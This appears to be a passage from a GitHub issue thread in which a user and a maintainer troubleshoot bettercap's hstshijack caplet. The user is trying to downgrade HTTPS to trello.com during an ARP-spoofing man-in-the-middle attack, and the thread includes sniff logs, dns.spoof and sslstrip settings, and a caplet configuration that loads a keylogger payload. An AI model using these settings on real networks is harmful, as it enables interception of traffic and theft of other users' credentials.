192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : js.hs-scripts.com is 104.17.214.204, 104.17.213.204, 104.17.212.204, 104.17.210.204, 104.17.211.204
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : a-0001.a-msedge.net is 204.79.197.200, 13.107.21.200
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e15071.dscd.akamaiedge.net is 104.83.46.36
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d1mjjsrsnwnwry.cloudfront.net is 54.240.186.50, 54.240.186.85, 54.240.186.220, 54.240.186.228
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : js.hs-scripts.com is 104.17.211.204, 104.17.214.204, 104.17.212.204, 104.17.213.204, 104.17.210.204
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : a-0001.a-msedge.net is 204.79.197.200, 13.107.21.200
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : star-mini.c10r.facebook.com is 157.240.1.35
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : e15071.dscd.akamaiedge.net is 104.83.46.36
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : d1mjjsrsnwnwry.cloudfront.net is 54.240.186.228, 54.240.186.50, 54.240.186.85, 54.240.186.220
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://www.googleadservices.com
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://5406241.fls.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://js.hs-scripts.com
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e6653.dscf.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://c.trello.com
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://sjs.bizographics.com
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://bat.bing.com
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://www.facebook.com
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : js.hs-analytics.net is 104.17.71.176, 104.17.68.176, 104.17.67.176, 104.17.70.176, 104.17.69.176
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : js.hs-analytics.net is 104.17.71.176, 104.17.68.176, 104.17.67.176, 104.17.70.176, 104.17.69.176
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : pagead46.l.doubleclick.net is 74.125.136.154, 74.125.136.157, 74.125.136.155, 74.125.136.156
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.https] sni 192.168.1.33 > https://js.hs-analytics.net
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : pagead46.l.doubleclick.net is 216.58.201.162
192.168.1.0/24 > 192.168.1.1  » [13:04:34] [net.sniff.https] sni 192.168.1.33 > https://googleads.g.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [13:04:34] [net.sniff.https] sni 192.168.1.33 > https://adservice.google.es
192.168.1.0/24 > 192.168.1.1  » [13:04:34] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:35] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : pop-vmi1-alpha.mix.linkedin.com is 108.174.11.21
192.168.1.0/24 > 192.168.1.1  » [13:04:35] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : track.hubspot.com is 104.16.250.5, 104.16.253.5, 104.16.252.5, 104.16.251.5, 104.16.249.5
192.168.1.0/24 > 192.168.1.1  » [13:04:35] [net.sniff.https] sni 192.168.1.33 > https://track.hubspot.com
192.168.1.0/24 > 192.168.1.1  » [13:04:35] [net.sniff.https] sni 192.168.1.33 > https://px.ads.linkedin.com
192.168.1.0/24 > 192.168.1.1  » [13:04:47] [net.sniff.https] sni 192.168.1.33 > https://fonts.gstatic.com
192.168.1.0/24 > 192.168.1.1  » exit

And the inspector tab form chrome is the following:

2

And yeah, I have clean all my cookies, browser preferences and all that stuff in the browser before trying.

The behaviour have been these one:

  • I sniffed all http traffic but none from https.
  • The accessing to trello.com I did not get redirected to trello.corn or even https://trello.com or corn.
  • when going directly to https://trello.com I did also not get redirected. I got all the traffic passing by the MiTM scenario, Have internet access but i didn't sniff anything.
  • Accesing to trello.corn doen't returned me anything but I expected that as I imagine my it tries to go to that host, bettercap doesn't tries to reverse resolve corn to com in its internal logic.

Cheers!

@buffermet
Copy link
Member

buffermet commented Mar 17, 2019

@JBalanza

What happens if you configure set dns.spoof.domains *.corn, then call dns.spoof on and navigate directly to http://trello.corn?

I just tested the caplet again by arp spoofing my phone, and trello.com loaded without SSL. The reason why it does not redirect you to trello.corn is because there is no response with a location header redirecting you to a targeted hostname (in this case trello.com). In other words, there is no need to spoof trello.com if it is requested via HTTP.

image

So it turns out that Chrome does not show any signs of SSL in the network tools... That's annoying, but from the response code (200) I can tell that you are directly connecting to https://trello.com, and not http://trello.com. This is because of your browser. Stupid question: you are not using a plugin like HTTPS Everywhere, right? 😄

If not, then I blame HSTS and you should find another way to clear it, perhaps via chrome://net-internals/#hsts? (Firefox has an easier way of clearing HSTS with a Forget about this site button)

I just visited https://trello.com on mobile Chrome, then cleared my history and tried http://trello.com, which forced me to connect to https://trello.com, so it seems that Chrome is stricter with HSTS records.

Then again, it was already made clear that you cannot spoof connections to a HSTS enabled hostname, and that the only way to get around this is to inject a page with a hyperlink/redirect to trello.com, so that your JS payload can manipulate that page and change these hyperlinks/redirections to send the victim to trello.corn instead of trello.com.

TL;DR

If you have ever visited https://trello.com using Chrome, you will not be able to type trello.com or http://trello.com and expect your browser to send a HTTP request first. Chrome will simply not allow unencrypted connections made directly to trello.com for at least 6 months because trello uses HSTS. I am really not sure how this can be explained more clearly.

So we can establish that the days of being able to sniff/inject HSTS enabled hostNAMES are indeed over, at least for Chrome :)

References:

#428 (comment)

Screenshot from 2019-03-17 23-41-41

Remember that Strict-Transport-Security headers do not behave the same as Location headers that tell users to use SSL.

@buffermet
Copy link
Member

@JBalanza however what puzzles me is that you do seem to receive HTTP requests for trello.com...

192.168.1.0/24 > 192.168.1.1 » [13:04:19] [net.sniff.http.request] http 192.168.1.33 GET trello.com/

🤔 let's see what happens when you delete trello.com in chrome://net-internals/#hsts

@buffermet
Copy link
Member

First of all, just to let you know, when upgrading bettercap by go method, I got 2.17

Also make sure you add the -u flag when updating bettercap's source, example:

go get -u github.com/bettercap/bettercap

The -u flag instructs get to use the network to update the named packages
and their dependencies. By default, get uses the network to check out
missing packages but does not use it to look for updates to existing packages.

@JBalanza
Copy link

Thanks for answering, I will add:

set dns.spoof.domains *.corn
dns.spoof on

in the caplet and delete trello from hsts in chrome-internals. I will post here the results.

@JBalanza
Copy link

I've just tried, the same results.

I added the dns spoof lines I commented before and as it were not working I also added the set http.proxy.sslstrip true for enhancing results I thought.

The behaviour still exactly the same. This time I tested with my android (I dont use HTTPS Everywhere or any plugin like that, the only I have installed is the norton app but I think it does not have any interference with the scenario) and used the samsung built-in browser. I never used it, quite less for accessing trello. The following log is the result:

bettercap v2.19 (built for linux amd64 with go1.10.4) [type 'help' for a list of commands]

[21:09:50] [sys.log] [war] Could not detect gateway.
[21:09:50] [endpoint.new] endpoint 192.168.1.33 detected as 48:a4:72:43:a7:e2 (Intel Corporate).
[21:09:50] [sys.log] [inf] [hstshijack] Generating random variable names for this session ...
[21:09:50] [sys.log] [inf] [hstshijack] Reading SSL log ...
[21:09:50] [sys.log] [inf] [hstshijack] No SSL log file found, creating one now ...
[21:09:50] [sys.log] [inf] [hstshijack] Reading caplet ...

  Commands

    hstshijack.show : Show module info.

  Caplet

               hstshijack.log > /opt/bettercap/ssl.log
           hstshijack.payload > /usr/local/share/bettercap/caplets/hstshijack/payloads/hstshijack-payload.js
            hstshijack.ignore > *
           hstshijack.targets > *.com
      hstshijack.replacements > *.corn
      hstshijack.blockscripts > undefined
         hstshijack.obfuscate > true
            hstshijack.encode > false
    hstshijack.custompayloads > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js
                              > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js

  Session info

         Session ID : qWCSnnnLBg
      Callback Path : /lIJxUEkVa
     Whitelist Path : /LDYjyczIighIfGEG
       SSL Log Path : /fhAEJSnESEmZYl
            SSL Log : 1 host

[21:09:50] [sys.log] [inf] [hstshijack] Module loaded.
[21:09:50] [sys.log] [inf] http.proxy started on 192.168.1.1:8200 (sslstrip enabled)
[21:09:50] [sys.log] [inf] dns.spoof *.corn -> 192.168.1.1
192.168.1.0/24 > 192.168.1.1  » [21:09:56] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : 4-c-0003.c-msedge.net is 13.107.4.52
192.168.1.0/24 > 192.168.1.1  » [21:09:57] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.gstatic.com is 64.233.177.94
192.168.1.0/24 > 192.168.1.1  » [21:10:04] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : js.hs-analytics.net is 104.17.71.176, 104.17.70.176, 104.17.69.176, 104.17.68.176, 104.17.67.176
192.168.1.0/24 > 192.168.1.1  » [21:10:04] [net.sniff.https] sni 192.168.1.33 > https://a.trellocdn.com
192.168.1.0/24 > 192.168.1.1  » [21:10:04] [net.sniff.https] sni 192.168.1.33 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:10:04] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:10:04] [net.sniff.https] sni 192.168.1.33 > https://p.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:10:12] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : play.google.com is 172.217.17.14
192.168.1.0/24 > 192.168.1.1  » [21:10:12] [net.sniff.https] sni 192.168.1.33 > https://play.google.com
[21:10:12] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.com is 64.233.177.99, 64.233.177.106, 64.233.177.147, 64.233.177.104, 64.233.177.103, 64.233.177.105
192.168.1.0/24 > 192.168.1.1  » [21:10:18] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:10:18] [net.sniff.https] sni 192.168.1.33 > https://a.trellocdn.com
[21:10:18] [net.sniff.https] sni 192.168.1.33 > https://use.typekit.net
[21:10:18] [net.sniff.https] sni 192.168.1.33 > https://p.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:10:25] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googleapis.l.google.com is 172.217.17.10, 172.217.168.170, 172.217.16.234, 216.58.211.42
192.168.1.0/24 > 192.168.1.1  » [21:10:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googleapis.l.google.com is 172.217.17.10, 172.217.168.170, 172.217.16.234, 216.58.211.42, 216.58.201.170, 216.58.214.170, 216.58.210.170
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.com is 184.27.2.122
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d1mjjsrsnwnwry.cloudfront.net is 13.33.232.97, 13.33.232.49, 13.33.232.44, 13.33.232.42
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e6653.dscf.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d2k1ftgv7pobq7.cloudfront.net is 13.33.232.4, 13.33.232.68, 13.33.232.6, 13.33.232.42
[21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e6653.f.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : dual-a-0001.a-msedge.net is 204.79.197.200, 13.107.21.200
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.https] sni 192.168.1.33 > https://p.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.https] sni 192.168.1.33 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : star-mini.c10r.facebook.com is 157.240.9.35
[21:10:52] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : e6653.dscf.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : d2k1ftgv7pobq7.cloudfront.net is 13.33.232.4, 13.33.232.68, 13.33.232.42, 13.33.232.6
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : e6653.f.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : gstaticadssl.l.google.com is 172.217.0.67
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e2286.e2.akamaiedge.net is 23.214.73.99
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e15071.dscd.akamaiedge.net is 104.83.46.36
192.168.1.0/24 > 192.168.1.1  » [21:10:52] [net.sniff.https] sni 192.168.1.33 > https://a.trellocdn.com
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [endpoint.new] endpoint 192.168.1.35 detected as 9c:e0:63:79:92:2e (Samsung Electronics Co.,Ltd).
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : connectivitycheck.gstatic.com is 172.217.0.131
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.35 : connectivitycheck.gstatic.com is 64.233.177.94
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : connectivitycheck.gstatic.com is 172.217.12.99
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.35 : connectivitycheck.gstatic.com is 172.217.11.131
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www.google.com is 64.233.177.147, 64.233.177.105, 64.233.177.106, 64.233.177.103, 64.233.177.99, 64.233.177.104
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : connectivitycheck.gstatic.com is 172.217.11.131
192.168.1.0/24 > 192.168.1.1  » [21:11:39] [net.sniff.https] sni 192.168.1.35 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : mobile-gtalk.l.google.com is 74.125.21.188
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www.google.com is 216.58.193.164
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.35 : www.google.com is 64.233.177.147, 64.233.177.105, 64.233.177.106, 64.233.177.103, 64.233.177.99, 64.233.177.104
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.https] sni 192.168.1.35 > https://samsung.com:5223
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : clients.l.google.com is 64.233.177.138, 64.233.177.102, 64.233.177.100, 64.233.177.113, 64.233.177.101, 64.233.177.139
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : spoc-mue1.norton.com is 40.114.95.106
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.https] sni 192.168.1.35 > https://mtalk.google.com:5228
192.168.1.0/24 > 192.168.1.1  » [21:11:40] [net.sniff.https] sni 192.168.1.35 > https://spoc-pool-gtm.norton.com
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : d3vu4amagmd4v3.cloudfront.net is 13.33.232.80, 13.33.232.49, 13.33.232.91, 13.33.232.13
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni 192.168.1.35 > https://config-api.internet.apps.samsung.com
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : fe-pew1-ext-openapi-lb-547958838.eu-west-1.elb.amazonaws.com is 52.213.180.75, 54.76.184.158, 34.248.143.217, 52.211.221.138, 52.209.251.113, 52.48.243.40, 52.51.246.198, 34.248.204.18
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni MSI-P65.local > https://p.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni MSI-P65.local > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni MSI-P65.local > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni MSI-P65.local > https://a.trellocdn.com
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : config.samqaicongen.com is 13.33.232.70, 13.33.232.79, 13.33.232.113, 13.33.232.123
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.dns] dns 80.58.61.254 > 192.168.1.35 : star.c10r.facebook.com is 31.13.83.8
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni 192.168.1.35 > https://config.samqaicongen.com
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni 192.168.1.35 > https://config.samqaicongen.com
192.168.1.0/24 > 192.168.1.1  » [21:11:43] [net.sniff.https] sni 192.168.1.35 > https://edge-chat.facebook.com
192.168.1.0/24 > 192.168.1.1  » [21:11:44] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : android.l.google.com is 216.58.211.46, 216.58.201.174, 216.58.214.174, 172.217.17.14, 172.217.168.174, 172.217.16.238
192.168.1.0/24 > 192.168.1.1  » [21:11:44] [net.sniff.https] sni 192.168.1.35 > https://android.clients.google.com
192.168.1.0/24 > 192.168.1.1  » [21:11:44] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : promo.webpayments.closeby.internet.apps.samsung.com is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : star-mini.c10r.facebook.com is 157.240.1.35
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://www.facebook.com
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : ds-global3.l7.search.ystg1.b.yahoo.com is 212.82.100.137
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : webstore.samqaicongen.com is 13.33.232.103, 13.33.232.50, 13.33.232.92, 13.33.232.6
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : duckduckgo.com is 79.125.105.113, 176.34.155.23, 46.51.179.90
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://webstore.samqaicongen.com
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://duckduckgo.com
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://es.search.yahoo.com
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : scontent.xx.fbcdn.net is 31.13.83.4
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : s.gycs.b.yahoodns.net is 87.248.114.12, 87.248.114.11
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://static.xx.fbcdn.net
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://static.xx.fbcdn.net
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://static.xx.fbcdn.net
192.168.1.0/24 > 192.168.1.1  » [21:11:45] [net.sniff.https] sni 192.168.1.35 > https://static.xx.fbcdn.net
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : scontent.xx.fbcdn.net is 157.240.9.23
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.https] sni 192.168.1.35 > https://static.xx.fbcdn.net
192.168.1.0/24 > 192.168.1.1  » 192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.https] sni 192.168.1.35 > https://static.xx.fbcdn.net
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : app-analytics.snapchat.com is 35.186.197.135
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : sc-analytics.appspot.com is 172.217.18.52
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.https] sni 192.168.1.35 > https://connect.facebook.net
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : mue1-shasta-wrs-prod02.eastus.cloudapp.azure.com is 23.100.23.223
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.https] sni 192.168.1.35 > https://nms-shasta-wrs.symantec.com
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www.google.com is 64.233.177.147, 64.233.177.105, 64.233.177.106, 64.233.177.103, 64.233.177.99, 64.233.177.104
192.168.1.0/24 > 192.168.1.1  » [21:11:46] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.35 : www.google.com is 64.233.177.106, 64.233.177.105, 64.233.177.103, 64.233.177.99, 64.233.177.104, 64.233.177.147
192.168.1.0/24 > 192.168.1.1  » [21:11:47] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : secureapi.samqaicongen.com is 13.33.232.73, 13.33.232.27, 13.33.232.9, 13.33.232.12
192.168.1.0/24 > 192.168.1.1  » [21:11:47] [net.sniff.https] sni 192.168.1.35 > https://secureapi.samqaicongen.com
192.168.1.0/24 > 192.168.1.1  » [21:11:48] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www.internet.apps.samsung.com is 13.33.232.62, 13.33.232.126, 13.33.232.28, 13.33.232.90
192.168.1.0/24 > 192.168.1.1  » [21:11:48] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : d3slksjbrcxk8c.cloudfront.net is 13.33.235.4, 13.33.235.200, 13.33.235.135, 13.33.235.48
192.168.1.0/24 > 192.168.1.1  » [21:11:48] [net.sniff.https] sni 192.168.1.35 > https://d3slksjbrcxk8c.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:11:49] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www.google.es is 216.58.201.163
192.168.1.0/24 > 192.168.1.1  » [21:11:50] [net.sniff.https] sni 192.168.1.35 > https://config.samqaicongen.com
192.168.1.0/24 > 192.168.1.1  » [21:11:50] [net.sniff.https] sni 192.168.1.35 > https://www.google.es
192.168.1.0/24 > 192.168.1.1  » [21:11:50] [net.sniff.https] sni 192.168.1.35 > https://www.google.es
192.168.1.0/24 > 192.168.1.1  » [21:11:50] [net.sniff.https] sni 192.168.1.35 > https://www.google.es
192.168.1.0/24 > 192.168.1.1  » [21:11:50] [net.sniff.https] sni 192.168.1.35 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [21:11:50] [net.sniff.https] sni 192.168.1.35 > https://www.google.es
[21:11:50] [net.sniff.https] sni 192.168.1.35 > https://www.google.es
192.168.1.0/24 > 192.168.1.1  » [21:11:50] [net.sniff.https] sni 192.168.1.35 > https://www.google.es
192.168.1.0/24 > 192.168.1.1  » [21:11:51] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : trello.com is 184.27.2.122
192.168.1.0/24 > 192.168.1.1  » [21:11:51] [net.sniff.https] sni 192.168.1.35 > https://www.facebook.com
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : contentsblock.samqaicongen.com is 13.33.232.70, 13.33.232.123, 13.33.232.113, 13.33.232.79
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.https] sni 192.168.1.35 > https://contentsblock.samqaicongen.com
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.https] sni 192.168.1.35 > https://edge-chat.facebook.com
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.dns] dns 80.58.61.254 > 192.168.1.35 : star-mini.c10r.facebook.com is 31.13.83.36
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.dns] dns 80.58.61.254 > 192.168.1.35 : a.ns.c10r.facebook.com is 2a03:2880:fffe:b:face:b00c:0:99, 69.171.239.11
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.dns] dns 80.58.61.254 > 192.168.1.35 : b.ns.c10r.facebook.com is 2a03:2880:ffff:b:face:b00c:0:99, 69.171.255.11
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.https] sni 192.168.1.35 > https://m.facebook.com
192.168.1.0/24 > 192.168.1.1  » [21:11:54] [net.sniff.https] sni 192.168.1.35 > https://contentsblock.samqaicongen.com
192.168.1.0/24 > 192.168.1.1  » [21:12:05] [net.sniff.dns] dns 8.8.8.8 > MSI-P65.local : a1834.dspg2.akamai.net is 2.22.126.75, 2.22.126.97
192.168.1.0/24 > 192.168.1.1  » [21:12:07] [net.sniff.dns] dns 8.8.8.8 > MSI-P65.local : d-sjc.v.dropbox.com is 162.125.34.137
192.168.1.0/24 > 192.168.1.1  » [21:12:10] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : e16.whatsapp.net is 169.60.79.60, 50.22.240.181, 158.85.233.52, 169.61.101.138, 169.63.64.140, 169.47.35.61
192.168.1.0/24 > 192.168.1.1  » [21:12:26] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : trello.com is 184.27.2.122
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : googleadapis.l.google.com is 172.217.16.234
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : d2k1ftgv7pobq7.cloudfront.net is 13.33.232.68, 13.33.232.4, 13.33.232.6, 13.33.232.42
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://fonts.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www-google-analytics.l.google.com is 172.217.17.14
